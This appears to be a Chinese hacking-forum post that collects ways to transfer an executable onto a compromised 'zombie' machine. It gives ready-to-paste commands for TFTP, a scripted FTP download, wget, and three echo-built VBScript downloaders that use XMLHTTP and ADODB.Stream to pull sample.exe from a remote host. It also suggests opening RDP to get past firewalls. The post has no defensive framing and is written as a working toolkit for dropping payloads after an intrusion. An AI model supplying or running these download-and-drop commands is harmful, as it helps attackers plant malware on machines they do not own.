作者:小虾米 来自:朋友的家
现在将本人用于上传的方法进行汇总如下:
1. tftp法
先在自己某机器上建个tftp服务器,如执行tftpd32.exe,
再将文件(sample.exe)上传到别的机器中(肉鸡),
肉鸡cmd中执行: tftp -i 服务器ip get sample.exe
2. ftp法
肉鸡cmd中执行:
echo open ftp服务器ip [端口]>ftp.txt
echo username>>ftp.txt
echo password>>ftp.txt
echo get sample.exe>>ftp.txt
echo bye>>ftp.txt
ftp -s:ftp.txt
del ftp.txt
3. 工具法
利用wineggdrop的wget.exe
肉鸡cmd中执行:wget 网站/sample.exe
4. 利用dl.vbe法
肉鸡cmd中执行:
echo with wscript:if .arguments.count^<2 then .quit:end if >dl.vbe
echo set aso=.createobject(“adodb.stream”):set web=createobject(“microsoft.xmlhttp”) >>dl.vbe
echo web.open “get”,.arguments(0),0:web.send:if web.status^>200 then quit >>dl.vbe
echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >>dl.vbe
cscript dl.vbe http://*。*。*。*:88/sample.exe sample.exe
5. 利用iget.vbe法
方法同4,
肉鸡cmd中执行:
echo ilocal = lcase(wscript.arguments(1)) >iget.vbe
echo iremote = lcase(wscript.arguments(0)) >>iget.vbe
echo set xpost = createobject(“microsoft.xmlhttp”) >>iget.vbe
echo xpost.open “get”,iremote,0 >>iget.vbe
echo xpost.send() >>iget.vbe
echo set sget = createobject(“adodb.stream”) >>iget.vbe
echo sget.mode = 3 >>iget.vbe
echo sget.type = 1 >>iget.vbe
echo sget.open() >>iget.vbe
echo sget.write(xpost.responsebody) >>iget.vbe
echo sget.savetofile ilocal,2 >>iget.vbe
cscript iget.vbe http://*。*。*。*/sample.exe sample.exe
6. 利用http网站vbe法
echo set xpost = createobject(“microsoft.xmlhttp”) >dsa.vbe
echo xpost.open “get”,”http://*.*.*.*/sample.exe”,0 >>dsa.vbe
echo xpost.send() >>dsa.vbe
echo set sget = createobject(“adodb.stream”) >>dsa.vbe
echo sget.mode = 3 >>dsa.vbe
echo sget.type = 1 >>dsa.vbe
echo sget.open() >>dsa.vbe
echo sget.write(xpost.responsebody) >>dsa.vbe
echo sget.savetofile “sample.exe”,2 >>dsa.vbe
cscript dsa.vbe
del dsa.vbe
7. 3389法
可以开3389,然后登陆,进行本地的下载。该方法对服务器上传很严格的机器特有效。(包括硬件防火墙)
8. 其他未公开的方法